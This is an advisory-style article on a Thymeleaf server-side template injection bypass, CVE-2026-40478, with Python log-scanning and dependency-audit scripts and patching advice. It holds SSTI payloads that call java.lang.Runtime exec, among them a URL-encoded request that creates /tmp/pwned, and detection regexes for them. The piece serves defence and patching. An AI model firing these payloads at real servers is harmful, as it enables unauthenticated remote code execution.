In April 2026, a new vulnerability was published for Thymeleaf, a popular Java template engine used by thousands of web applications: CVE-2026-40478. This issue allows attackers to bypass Thymeleaf’s server-side expression injection protections and potentially execute unauthorized server-side code, all without any authentication.

In this article, you’ll find a clear explanation of how this flaw works, code samples, pointers to official sources, and a demonstration of how an attacker could exploit it. Understanding this helps you assess your own risk and protect your apps.

What is Thymeleaf and Why Does This Matter?

Thymeleaf is a popular Java-based template engine used both for web and standalone apps. Developers use it to generate HTML, email, and text by embedding values and logic in templates. It’s the engine behind countless Spring Boot apps.

The Problem: When apps pass unsanitized user input directly to templates, attackers can sometimes inject server-side expressions. Thymeleaf offered protections against this, but versions up to 3.1.3.RELEASE didn’t block some clever bypass patterns.

Technical Details

This vulnerability exists because Thymeleaf’s “expression execution mechanisms”, the parts that evaluate dynamic th:* attributes, literal expressions, and inlined expressions ([[...]] and [(...)]), fail to properly block certain syntax. This opens the door for Server-Side Template Injection (SSTI), even if developers think they’re protected.

Vulnerable versions:
* <= 3.1.3.RELEASE

Fixed in:
* 3.1.4.RELEASE

If user input ends up being parsed by Thymeleaf as expression syntax (for example, because a view name, a fragment selector, or a dynamic attribute value is built from it), an attacker can craft input that is treated as an expression even when the developer intended it to be plain text.

Suppose a developer writes this snippet in their controller, trusting user input:

@GetMapping("/hello")
public String hello(@RequestParam("name") String name, Model model) {
    model.addAttribute("username", name); // user controls username
    return "hello";
}

And in the Thymeleaf template (hello.html)

<p th:text="${username}"></p>

With the snippet exactly as written, Thymeleaf evaluates ${username} once and writes the resulting string as escaped text; a value such as ${T(...)} is output literally and is not parsed a second time, so this particular pairing is not by itself an injection point. The bypass described here matters once attacker-controlled text is parsed as expression syntax, which happens when the value is concatenated into a view name returned by the controller, into a fragment selector, or into a pre-processed __${...}__ expression. In any of those positions a user could send a malicious value as the name parameter, for example:

http://example.com/hello?name=${T(java.lang.Runtime).getRuntime().exec('id')}

Thymeleaf tries to block dangerous expressions such as T(java.lang.Runtime), but in 3.1.3.RELEASE and earlier specific patterns slip through, particularly obfuscated or partially encoded input and input that abuses overlooked escape rules.

Exploitation steps

1. Send a crafted GET request

GET /hello?name=%24%7BT(java.lang.Runtime).getRuntime().exec('touch%20/tmp/pwned')%7D HTTP/1.1
Host: victim-app

*(That’s ${T(java.lang.Runtime).getRuntime().exec('touch /tmp/pwned')} URL-encoded)*

2. Template processing

When the decoded value reaches a point where Thymeleaf parses it as an expression, a vulnerable version does not block it, evaluates it, and runs the Java code (in this case, creating /tmp/pwned on the server). 3.1.4.RELEASE closes this gap.
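A detection check over web-server access logs, added here as an example; it is not part of the original article and not code from the Thymeleaf project. It percent-decodes each request target repeatedly (so double-encoded payloads such as %2524%257B are unmasked, the kind of partially encoded input a single-pass filter misses) and flags Thymeleaf expression openers, the __...__ pre-processing marker, and the SpEL T(...) type operator used in the payload above. Python is used so the check runs without a JVM. The log lines are constructed for the demonstration, and the indicator names and the log format are assumptions, not anything taken from an advisory.

```python
"""Flag HTTP request lines that carry Thymeleaf/SpEL expression syntax after decoding."""
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache-style request line), not from a real server.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Apr/2026:21:57:01 +0000] "GET /hello?name=alice HTTP/1.1" 200 512
10.0.0.9 - - [17/Apr/2026:21:58:12 +0000] "GET /hello?name=%24%7BT(java.lang.Runtime).getRuntime().exec('id')%7D HTTP/1.1" 500 0
10.0.0.9 - - [17/Apr/2026:21:58:40 +0000] "GET /hello?name=%2524%257BT(java.lang.Runtime)%257D HTTP/1.1" 200 512
10.0.0.7 - - [17/Apr/2026:21:59:03 +0000] "GET /static/app.css HTTP/1.1" 200 2048
10.0.0.9 - - [17/Apr/2026:22:00:15 +0000] "GET /hello?name=__%24%7B7*7%7D__%3A%3Ax HTTP/1.1" 200 512
"""

# Extracts method and request target from the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Indicator names are our own labels (assumed, not a standard taxonomy):
# Thymeleaf standard expression openers (${ *{ #{ @{ ~{), the __...__
# pre-processing marker, the SpEL type operator T(...), and the classes the
# payload on the page uses to run a command.
INDICATORS = {
    "std_expr": re.compile(r"[\$\*#@~]\{"),
    "preprocess": re.compile(r"__.+?__"),
    "spel_type": re.compile(r"\bT\s*\("),
    "runtime": re.compile(r"java\.lang\.(Runtime|ProcessBuilder)"),
}


def fully_decode(s, max_rounds=5):
    """Percent-decode repeatedly until the string stops changing, so that
    double- or triple-encoded payloads are unmasked (bounded to avoid loops)."""
    for _ in range(max_rounds):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    return s


def inspect_target(target):
    """Return the indicator names present in the decoded request target."""
    decoded = fully_decode(target)
    return [name for name, rx in INDICATORS.items() if rx.search(decoded)]


def scan_log(text):
    """Return (client_ip, raw_target, indicators) for each suspicious request line."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        found = inspect_target(m.group("target"))
        if found:
            hits.append((line.split(" ", 1)[0], m.group("target"), found))
    return hits


if __name__ == "__main__":
    for ip, target, found in scan_log(SAMPLE_LOG):
        print(f"{ip} {target} -> {', '.join(found)}")
```

Treat hits as triage leads rather than proof of exploitation: the 500 response on the second sample line is the kind of corroborating signal to check alongside a hit, and a request that carries only "std_expr" may be a harmless probe.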

Always treat user input as untrusted. Passing it as a model attribute and rendering it with th:text, as above,

model.addAttribute("username", userInput);

is the safe pattern on its own: the value is HTML-escaped and is never re-parsed as an expression. The dangerous pattern is letting that same value become part of something Thymeleaf parses: a view name concatenated from it, a fragment selector, a pre-processed __${...}__ expression, or an attribute name. Use th:utext only for HTML you generated yourself, and never let untrusted input into expressions or attribute names.

References & Resources

- Official CVE Record: CVE-2026-40478
- Thymeleaf Changelog 3.1.4.RELEASE
- OWASP: Template Injection
- Thymeleaf Docs: Expression Basic Objects

Upgrade to the fixed release (Maven dependency):

<dependency>
    <groupId>org.thymeleaf</groupId>
    <artifactId>thymeleaf</artifactId>
    <version>3.1.4.RELEASE</version>
</dependency>

If Spring Boot manages the version for you, override the thymeleaf.version property instead of declaring the dependency version directly.
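A dependency audit script, added here as an example (not code from the article or from the Thymeleaf project), written in Python so it runs on a build server without a JVM. It parses a pom.xml, resolves ${...} property references used in <version>, and reports whether org.thymeleaf:thymeleaf is below 3.1.4.RELEASE, treating pre-releases such as 3.1.4.M1 as older than 3.1.4.RELEASE. The pom.xml content is constructed for the demonstration; only the core artifact is judged, because that is the artifact whose range the advisory lists.

```python
"""Audit a Maven pom.xml for a Thymeleaf core version below the fixed release."""
import re
import xml.etree.ElementTree as ET

# Constructed sample pom.xml for the demonstration (not from any real project).
SAMPLE_POM = """\
<project xmlns="http://maven.apache.org/POM/4.0.0">
  <modelVersion>4.0.0</modelVersion>
  <groupId>com.example</groupId>
  <artifactId>demo</artifactId>
  <version>0.0.1-SNAPSHOT</version>
  <properties>
    <thymeleaf.version>3.1.2.RELEASE</thymeleaf.version>
  </properties>
  <dependencies>
    <dependency>
      <groupId>org.thymeleaf</groupId>
      <artifactId>thymeleaf</artifactId>
      <version>${thymeleaf.version}</version>
    </dependency>
    <dependency>
      <groupId>org.thymeleaf</groupId>
      <artifactId>thymeleaf-spring6</artifactId>
      <version>3.1.2.RELEASE</version>
    </dependency>
  </dependencies>
</project>
"""

NS = {"m": "http://maven.apache.org/POM/4.0.0"}


def parse_version(v):
    """Turn '3.1.3.RELEASE' into a comparable tuple. The leading numeric parts
    are kept; a final RELEASE (or no qualifier) sorts after any pre-release
    qualifier such as M1 or RC1 of the same number."""
    nums, qualifier = [], ""
    for part in v.split("."):
        if part.isdigit():
            nums.append(int(part))
        else:
            qualifier = part
            break
    while len(nums) < 3:
        nums.append(0)
    return tuple(nums[:3]) + ((1,) if qualifier in ("", "RELEASE") else (0,))


# Version from the article's "Fixed in" list.
FIXED = parse_version("3.1.4.RELEASE")


def resolve(value, props):
    """Expand ${property} references against <properties>; unknown names stay as-is."""
    return re.sub(r"\$\{([^}]+)\}", lambda m: props.get(m.group(1), m.group(0)), value)


def find_thymeleaf_deps(pom_xml):
    """Return (artifactId, resolved version) for every org.thymeleaf dependency."""
    root = ET.fromstring(pom_xml)
    props = {p.tag.split("}")[-1]: (p.text or "").strip()
             for p in root.findall("m:properties/*", NS)}
    found = []
    for dep in root.iter("{%s}dependency" % NS["m"]):
        gid = dep.findtext("m:groupId", "", NS).strip()
        aid = dep.findtext("m:artifactId", "", NS).strip()
        ver = dep.findtext("m:version", "", NS).strip()
        if gid == "org.thymeleaf":
            found.append((aid, resolve(ver, props)))
    return found


def audit(pom_xml):
    """Return (artifactId, version, vulnerable) for the core artifact; vulnerable is
    None when the version is inherited from a parent or BOM and cannot be read here."""
    rows = []
    for aid, ver in find_thymeleaf_deps(pom_xml):
        if aid != "thymeleaf":
            continue
        if not ver:
            rows.append((aid, "(managed by parent/BOM)", None))
        else:
            rows.append((aid, ver, parse_version(ver) < FIXED))
    return rows


if __name__ == "__main__":
    for aid, ver, vulnerable in audit(SAMPLE_POM):
        print(f"org.thymeleaf:{aid} {ver} vulnerable={vulnerable}")
```

For projects that inherit the version from spring-boot-starter-parent (no <version> element on the dependency, or only the starter declared), the script reports the version as managed; run mvn dependency:tree and check the resolved org.thymeleaf:thymeleaf line instead.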

NEVER Pass User Input Directly to Expressions:

Always validate and sanitize user input. Don’t use dynamic expressions unless you fully control the values.

Validate Inputs:

Prefer allow-list validation (for example, restricting a parameter to a fixed set of known values) over stripping "dangerous" characters: the bypass patterns behind this advisory are exactly the obfuscated and partially encoded inputs that a character-stripping filter misses.

Summary

CVE-2026-40478 is a serious security bypass in Thymeleaf’s expression evaluation, enabling unauthenticated SSTI if untrusted input reaches template expressions. While updating Thymeleaf to 3.1.4.RELEASE closes the door, it’s essential to understand the risks and treat all user input as dangerous in template logic.

Patch now, audit your code, and always protect your users by following secure coding best practices.


*Exclusive content by AI. For learning only. Always verify and test in your own environment. Stay safe!*

Timeline

Published on: 04/17/2026 21:57:01 UTC
Last modified on: 04/17/2026 22:16:33 UTC